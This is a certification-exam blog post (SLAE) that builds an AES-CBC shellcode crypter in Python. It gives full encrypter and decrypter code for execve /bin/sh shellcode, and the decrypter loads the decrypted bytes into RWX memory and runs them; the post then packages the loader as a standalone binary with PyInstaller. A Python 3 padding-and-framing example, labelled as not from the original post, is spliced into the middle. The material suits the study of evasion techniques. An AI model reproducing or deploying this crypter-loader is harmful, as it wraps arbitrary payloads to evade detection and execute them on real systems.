SLAE 0x7 – Custom crypter

Crypters are programs that encrypt an executable or shellcode, decrypt it at runtime and then run it. The idea is to use a key to encrypt the shellcode; at runtime the encrypted shellcode is decrypted with the same key and then executed.

To understand this further we will create our own crypter using the AES encryption algorithm. AES (Advanced Encryption Standard) is a symmetric-key block cipher. I am no crypto expert, so we will leverage the Python PyCrypto module (imported as Crypto) to generate our encrypted shellcode using AES in CBC mode. In a nutshell, the code pads the shellcode to a multiple of the block size, generates a random IV (Initialization Vector) of one block, creates a CBC-mode cipher object from the key and that IV, and encrypts the padded shellcode. The IV is prepended to the ciphertext so the decrypter can recover it, and the result is returned as hex.

Observe that we use the execve /bin/sh shellcode as the payload to be encrypted and "slaesecuritytube" as the key.

#!/usr/bin/env python
# Python 2 / PyCrypto: encrypt the shellcode with AES-CBC and print IV || ciphertext as hex

from Crypto import Random
from Crypto.Cipher import AES

BS = 16  # AES block size in bytes

# PKCS#7-style padding: append N bytes of value N so the length is a multiple of BS
pad = lambda s: s + (BS - len(s) % BS) * chr(BS - len(s) % BS)
unpad = lambda s: s[0:-ord(s[-1])]


class AESCipher:

    def __init__(self, key):
        self.key = key  # must be 16, 24 or 32 bytes long

    def encrypt(self, raw):
        raw = pad(raw)
        iv = Random.new().read(AES.block_size)  # fresh random IV for every encryption
        cipher = AES.new(self.key, AES.MODE_CBC, iv)
        # prepend the IV so the decrypter can recover it, then hex-encode the whole blob
        return (iv + cipher.encrypt(raw)).encode('hex')


cipher = AESCipher('slaesecuritytube')  # key is "slaesecuritytube" (16 bytes)
# encrypt the execve /bin/sh shellcode
encrypted = cipher.encrypt('\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80')

print "Encrypted shellcode: " + encrypted

Let's run our Python script to generate the encrypted shellcode:

ddpinto@ddpinto-VirtualBox:~$ python aes_encrypter.py
Encrypted shellcode: fdadcef923a8e3da901e5ce7a14cc30c3d170418db975e1733784398ab8cab3bbbc15d070c5301ce0a4ac8c800101b37

Let's include the encrypted shellcode in our decryption routine. Notice that we feed the same key "slaesecuritytube" to the decryption process. Once the decryption is complete, the decrypted shellcode is run to give us a /bin/sh shell.

#!/usr/bin/env python
# Python 2 / PyCrypto: decrypt IV || ciphertext with the same key, then run the shellcode via ctypes

from ctypes import CDLL, c_char_p, c_void_p, memmove, cast, CFUNCTYPE

from Crypto.Cipher import AES

BS = 16  # AES block size in bytes
pad = lambda s: s + (BS - len(s) % BS) * chr(BS - len(s) % BS)
unpad = lambda s: s[0:-ord(s[-1])]  # strip the padding using the value of the last byte


class AESCipher:

    def __init__(self, key):
        self.key = key

    def decrypt(self, enc):
        enc = enc.decode('hex')
        iv = enc[:16]  # the first block is the IV written by the encrypter
        cipher = AES.new(self.key, AES.MODE_CBC, iv)
        return unpad(cipher.decrypt(enc[16:]))


cipher = AESCipher('slaesecuritytube')  # same key as the encrypter
encrypted = 'fdadcef923a8e3da901e5ce7a14cc30c3d170418db975e1733784398ab8cab3bbbc15d070c5301ce0a4ac8c800101b37'
decrypted = cipher.decrypt(encrypted).encode('hex')
print "Decrypted shellcode: " + decrypted

# copy the decrypted bytes into a page-aligned buffer, mark it RWX and call it
libc = CDLL('libc.so.6')
shellcode = decrypted.decode('hex')
sc = c_char_p(shellcode)
size = len(shellcode)
addr = c_void_p(libc.valloc(size))
memmove(addr, sc, size)
libc.mprotect(addr, size, 0x7)  # PROT_READ | PROT_WRITE | PROT_EXEC
run = cast(addr, CFUNCTYPE(c_void_p))
print "Executing Shellcode"
run()

ddpinto@ddpinto-VirtualBox:~$ python aes_decrypter.py
Decrypted shellcode: 31c050686e2f7368682f2f626989e35089e25389e1b00bcd80
Executing Shellcode
$ id
uid=1000(ddpinto) gid=1000(ddpinto) groups=1000(ddpinto),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
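The encrypter and decrypter above leave two details implicit: the blob is framed as a 16-byte IV followed by the CBC ciphertext, and the pad/unpad lambdas trust the last byte blindly, so a wrong key produces garbage that is returned (and executed) as if it were valid shellcode. The following is an added example, not code from the original post; it reimplements the framing and padding layers in Python 3 with the standard library only, leaving the AES call itself to PyCrypto as on the page. The function names, the strict PKCS#7 check and the key-length check are my own; the hex blob, shellcode bytes and key are the ones printed above.

```python
#!/usr/bin/env python3
"""Added example (not from the original post): the framing and padding layers
around the crypter's AES call, standard library only. The AES call itself is
left to PyCrypto/PyCryptodome as on the page; these functions cover what sits
around it and what the post's pad/unpad lambdas do not check."""

BS = 16  # AES block size in bytes, as in the post

# Encrypted blob printed by the post's encrypter: 16-byte IV || CBC ciphertext.
ENCRYPTED_HEX = (
    "fdadcef923a8e3da901e5ce7a14cc30c3d170418db975e1733784398ab8cab3b"
    "bbc15d070c5301ce0a4ac8c800101b37"
)
# Plaintext execve /bin/sh shellcode as printed by the post's decrypter (25 bytes).
SHELLCODE = bytes.fromhex("31c050686e2f7368682f2f626989e35089e25389e1b00bcd80")
KEY = b"slaesecuritytube"  # the post's key


def check_key(key: bytes) -> bytes:
    """AES accepts only 16, 24 or 32-byte keys; anything else is a configuration error."""
    if len(key) not in (16, 24, 32):
        raise ValueError("AES key must be 16, 24 or 32 bytes, got %d" % len(key))
    return key


def pkcs7_pad(data: bytes, bs: int = BS) -> bytes:
    """Same scheme as the post's pad lambda: append n bytes of value n, 1 <= n <= bs."""
    n = bs - len(data) % bs
    return data + bytes([n]) * n


def lenient_unpad(data: bytes) -> bytes:
    """Byte-for-byte equivalent of the post's unpad lambda s[0:-ord(s[-1])].
    It trusts the last byte blindly, so a wrong key or a corrupted last block
    yields garbage that is handed back as if it were valid shellcode."""
    return data[0:-data[-1]]


def pkcs7_unpad(data: bytes, bs: int = BS) -> bytes:
    """Strict unpad: whole number of blocks, and every pad byte must equal n."""
    if not data or len(data) % bs:
        raise ValueError("data is not a whole number of blocks")
    n = data[-1]
    if not 1 <= n <= bs or data[-n:] != bytes([n]) * n:
        raise ValueError("bad PKCS#7 padding")
    return data[:-n]


def unpad_is_valid(data: bytes, bs: int = BS) -> bool:
    """True when strict unpadding accepts the data; shows what the lambda would let through."""
    try:
        pkcs7_unpad(data, bs)
        return True
    except ValueError:
        return False


def split_iv(blob_hex: str, bs: int = BS):
    """Parse the post's framing hex(IV || ciphertext) into (iv, ciphertext)."""
    blob = bytes.fromhex(blob_hex)
    if len(blob) < 2 * bs or len(blob) % bs:
        raise ValueError("blob must be an IV plus at least one whole block")
    return blob[:bs], blob[bs:]


def ciphertext_len(plaintext_len: int, bs: int = BS) -> int:
    """Length of the padded plaintext, hence of the CBC ciphertext (grows by 1..bs bytes)."""
    return (plaintext_len // bs + 1) * bs


if __name__ == "__main__":
    check_key(KEY)
    iv, ct = split_iv(ENCRYPTED_HEX)
    print("IV %d bytes, ciphertext %d bytes" % (len(iv), len(ct)))
    padded = pkcs7_pad(SHELLCODE)
    print("padded shellcode: %d -> %d bytes, pad byte %#x" % (len(SHELLCODE), len(padded), padded[-1]))
    assert ciphertext_len(len(SHELLCODE)) == len(ct)
    # Constructed garbage block, as produced by decrypting with the wrong key:
    # the post's lambda strips "something" and returns the rest, strict unpad refuses.
    garbage = bytes(range(16))
    print("lenient unpad of garbage:", lenient_unpad(garbage))
    print("strict unpad accepts garbage:", unpad_is_valid(garbage))
```

Running it confirms the numbers on the page: the 96-character hex blob is 48 bytes, i.e. one IV block plus two ciphertext blocks, and the 25-byte shellcode pads to 32 bytes with seven 0x07 bytes. The strict unpad is what a decrypter should use before handing bytes to mprotect: with the post's lambda, a wrong key does not fail, it silently returns garbage of roughly the right size.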

We can also use PyInstaller to package the decrypter as a standalone binary:

ddpinto@slae:~$ pyinstaller --onefile aes_decrypter.py
22 INFO: PyInstaller: 3.4
22 INFO: Python: 2.7.15rc1
22 INFO: Platform: Linux-4.15.0-46-generic-i686-with-Ubuntu-18.04-bionic
23 INFO: wrote /home/ddpinto/aes_decrypter.spec
30 INFO: UPX is not available.
35 INFO: Extending PYTHONPATH with paths
['/home/ddpinto', '/home/ddpinto']
36 INFO: checking Analysis
36 INFO: Building Analysis because Analysis-00.toc is non existent
36 INFO: Initializing module dependency graph…
37 INFO: Initializing module graph hooks…
88 INFO: running Analysis Analysis-00.toc
103 INFO: Caching module hooks…
106 INFO: Analyzing /home/ddpinto/aes_decrypter.py
1555 INFO: Loading module hooks…
1556 INFO: Loading module hook "hook-Crypto.py"...
Traceback (most recent call last):
File "<string>", line 2, in <module>
ImportError: No module named Math
1574 INFO: Loading module hook "hook-encodings.py"...
2102 INFO: Looking for ctypes DLLs
2127 INFO: Analyzing run-time hooks …
2144 INFO: Looking for dynamic libraries
2319 INFO: Looking for eggs
2320 INFO: Python library not in binary dependencies. Doing additional searching…
2343 INFO: Using Python library /usr/lib/i386-linux-gnu/libpython2.7.so.1.0
2345 INFO: Warnings written to /home/ddpinto/build/aes_decrypter/warn-aes_decrypter.txt
2370 INFO: Graph cross-reference written to /home/ddpinto/build/aes_decrypter/xref-aes_decrypter.html
2431 INFO: checking PYZ
2431 INFO: Building PYZ because PYZ-00.toc is non existent
2432 INFO: Building PYZ (ZlibArchive) /home/ddpinto/build/aes_decrypter/PYZ-00.pyz
2699 INFO: Building PYZ (ZlibArchive) /home/ddpinto/build/aes_decrypter/PYZ-00.pyz completed successfully.
2743 INFO: checking PKG
2748 INFO: Building PKG because PKG-00.toc is non existent
2748 INFO: Building PKG (CArchive) PKG-00.pkg
3931 INFO: Building PKG (CArchive) PKG-00.pkg completed successfully.
3936 INFO: Bootloader /home/ddpinto/.local/lib/python2.7/site-packages/PyInstaller/bootloader/Linux-32bit/run
3937 INFO: checking EXE
3937 INFO: Building EXE because EXE-00.toc is non existent
3937 INFO: Building EXE from EXE-00.toc
3937 INFO: Appending archive to ELF section in EXE /home/ddpinto/dist/aes_decrypter
3968 INFO: Building EXE from EXE-00.toc completed successfully.

Inside the dist directory you should find your binary:

ddpinto@ddpinto-VirtualBox:~/dist$ file aes_decrypter
aes_decrypter: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=7a1cca0c1ee8066745d43b624338ea1ac36eaabf, stripped
ddpinto@ddpinto-VirtualBox:~/dist$ ./aes_decrypter
Decrypted shellcode: 31c050686e2f7368682f2f626989e35089e25389e1b00bcd80
Executing Shellcode
$

There you go! Our binary works and successfully executed a /bin/sh shell.

Github: https://github.com/buffered4ever/SLAE – 0x7

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Student ID: PA-1932
